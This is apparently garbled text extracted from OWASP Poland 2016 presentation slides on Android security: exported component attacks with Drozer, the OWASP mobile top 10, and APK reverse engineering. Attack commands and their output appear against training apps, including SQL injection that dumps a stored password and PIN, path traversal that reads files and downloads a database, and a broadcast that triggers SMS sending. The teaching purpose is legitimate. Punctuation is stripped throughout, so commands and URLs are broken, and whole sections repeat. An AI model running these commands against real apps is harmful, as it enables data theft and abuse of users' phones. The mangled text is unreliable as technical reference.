Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
